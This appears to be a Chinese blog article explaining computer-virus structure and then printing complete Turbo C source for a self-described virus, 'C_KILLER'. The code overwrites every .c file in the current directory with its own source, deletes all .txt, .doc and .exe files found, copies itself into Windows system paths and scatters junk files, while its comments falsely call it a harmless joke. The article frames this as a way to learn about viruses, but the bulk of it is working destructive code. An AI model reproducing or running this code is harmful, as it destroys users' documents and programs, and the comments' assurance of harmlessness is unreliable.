用C语言编写简单的病毒
[摘要]在分析病毒机理的基础上,用C语言写了一个小病毒作为实例,用TURBOC2.0实现.
[Abstract] This paper introduce the charateristic of the computer virus,then show a simple example written by TURBOC2.0.
恶意软件可能是第一个对我们产生影响的计算机安全问题.所以病毒在信息安全中是非常重要的.
我们要对付病毒,就要了解病毒.
写一些病毒是一个非常好的办法.
假设要写一个病毒,先要知道它是什么.可以给病毒一个定义,这一定义是被广泛认可的。Frederic Cohen博士在《计算机病毒简短讲座》中提到的:
“……一种可以通过改动自身来包含或释放自我拷贝而传染给其它程序的程序。“
事实上病毒和普通程序并无太大不同,并且通常比較简单,不像非常多程序那样复杂。仅仅只是病毒里面用到一些正常程序一般不会用到的技术。
要编制一个病毒,首先要知道病毒的执行机理。
不论是何种病毒,它一般在结构上分为三个功能模块:感染机制,触发机制和有效载荷。
在病毒结构中,首要的并且唯一必需的部分是感染机制。病毒首先必须是可以生殖自身的代码,这是病毒之所以成为病毒的根本
原因。我们可以用一段类C伪码来表示这个过程。
{
if (infectable_object_found
&&object_not_already_infect)
infect_object;
}
一个简单的触发机制可能是这样工作的:
{
if (date_is_Friday_13th_and_time_is_03:13:13)
set_trigger_status_to_yes;
}
{
if (trigger_statue_is_yes)
execute_payload;
}
最常见的编制病毒的语言有汇编语言、VB、C 语言等,我们能够来看一看一个有名的病毒论坛上觉得学写病毒要掌握的基础:
1).Win32编程,进程,线程,内存,等等。
2).32位汇编,以指令使用方法为主。386汇编就比較够用了。
3).PE格式,有精力还能够看一下其他可能被感染的文件的文件格式。
4).调试技术。VC,TD32,SoftIce,等等。
要掌握的东西确实非常多,还多听都没听过,非常吓人.但实际上,即使我们对计算机的原理和操作系统不非常了解,并且不熟悉除C
以外的其他语言,仅仅要我们对C的库函数有一定了解,就能够写一些相似病毒的东西.
三 用C编制病毒
以TurboC2.0为例.它的库函数能够实现非常多功能.
如以下两个函数:
1).findfirst和findnext函数:在dir.h。findfirst用来找各种类型的文件,能够得到文件名称文件长度,文件属性等,findnext和findfirst配合使用,用来找到下一个同类型的文件。
2).remove函数:在stdio.h.仅仅要知道文件名称,能够删除随意类型的文件.
四 我写的C病毒
<<计算机病毒解密>>上有一句比較经典的话,"也许把恶意软件造成的损害说成是心理上的损害可能会更恰当一些".从这个意义上说,我的病毒是非常典型的病毒.
以下是我写的病毒.
它主要由四个模块组成.
CreatEXE()将在C盘的敏感地方放置几个.exe垃圾,它们要隐蔽一些。
Remove()会删掉你的一些东西,所以千万不要随便执行这个程序.
Breed()是C_KILLER的精华所在,它将kill全部的c程序,并利用它们生殖自身.
第四个能够说是它的感染机制.
IN FACT,IT"S NOT A VIRYUS AT ALL.
**********************************/
#include <io.h>
#include <dir.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
/* copy outfile to infile */
void copyfile(char *infile, char *outfile)
{
FILE *in,*out;
in = fopen(infile,"r");
out = fopen(outfile,"w");
while (!feof(in))
{
fputc(fgetc(in),out);
}
fclose(in);
fclose(out);
}
/*
This function named Rubbishmaker.
*/
void MakeRubbish()
{
int i;
FILE *fp;
char *path;
char *NewName;
char *disk[7] = {"A","B","C","D","E","F","G"};
char *addtion = "://";
/* Make some rubbish at the current catalogue */
for (i = 0; i<5; i++)
{
char tempname[] = "XXXXXX" ;
NewName = mktemp(tempname);
fp = fopen(NewName,"w");
fclose(fp);
}
/* make some rubbish at the root catalogue */
path = strcat(disk[getdisk()],addtion); /* get the root catalogue */
chdir(path); /*change directory according to the "path" */
for (i = 0; i<5; i++)
{
char tempname[] = "XXXXXX";
NewName = mktemp(tempname);
fp = fopen(NewName,"w");
fclose(fp);
}
}
/*
This function can creat some .exe or .com documents in the sensitive place.
Don't worry,It's only a joke.It will do no harm to your computer.
*/
void CreatEXE()
{
int i;
char *path;
char *s[2] = {"C://WINDOWS//system32//loveworm.exe","C://WINDOWS//virusssss.com"};
for ( i = 0; i < 2; i++)
{
open(s[i], 0x0100,0x0080);
copyfile( "C_KILLER.C",s[i]);
}
}
/* remove something from your computer */
void Remove()
{
int done;
int i;
struct ffblk ffblk;
char *documenttype[3] = {"*.txt","*.doc","*.exe"};
for (i = 0; i < 3; i++)
{
done = findfirst(documenttype[i],&ffblk,2);
while (!done)
{
remove(ffblk.ff_name);
done = findnext(&ffblk);
}
}
}
/* overlay the c programs */
void Breed()
{
int done;
struct ffblk ffblk;
done = findfirst("*.c",&ffblk,2);
while (!done)
{
if (strcmp("C_KILLER.C", ffblk.ff_name) != 0 )
{
copyfile("C_KILLER.C",ffblk.ff_name);
}
done = findnext(&ffblk);
}
}
void main()
{
printf("THERE IS A VIRUS BY XIAOKE./n/n");
Breed();
Remove();
CreatEXE();
printf("COULD YOU TELL ME YOUR NAME?/n/n");
printf("NOW,PLEASE ENTER YOUR NAME,OR THERE WILL BE SOME TROUBLE WITH YOU!/n/n");
MakeRubbish();
getchar();
printf("IT'S ONLY A JOKE! THANK YOU!/n/n");
clrscr();
system("cmd");
}
最新文章
- 源码阅读 etherum-transactions.py
- 使用 VS2005 通过按钮自动上传文件到Linux
- 在类库中引用WebService的注意事件
- map的使用
- Windows Internals学习笔记(七)Image Loader
- 【php学习】mysql数据库操作
- 整理的Unity导出安卓工程利用ANT进行多渠道批量打包APK
- [HDOJ 1171] Big Event in HDU 【完全背包】
- SWOT分析法
- n!的近似值 (stirling approximation)与 大O记法(big -O- notation)
- RFC Transactional RFC (tRFC) queue RFC(qRFC) 概念
- 老李推荐:第8章3节《MonkeyRunner源码剖析》MonkeyRunner启动运行过程-启动AndroidDebugBridge 3
- [转载] HBase vs Cassandra:我们迁移系统的原因
- K3数据字典备查
- Lambda表达式资料整理
- 跟我一步一步写出MongoDB Web 可视化工具(二)
- django中云存储静态文件
- java中函数的参数传递
- Call to localhost/127.0.0.1:9000 failed on connection exception:java.net.ConnectException的解决方案
- VeeamOne9.5-t添加监控服务器
热门文章
- [Angular] Protect The Session Id with https and http only
- vue给对象新添加属性,一定要使用Vue.set( target, key, value )这个API来添加
- js里的表格数组某个key去重
- POJ 3723 Conscription MST
- Day1:循环语句(While,For)
- thinkphp事务不能回滚的问题(因为助手函数)
- v-if和updated钩子结合使用 渲染echart图表
- IT人都很忙(茫)
- JAVA 如何将String进行大小写转换
- Effective C++ 条款28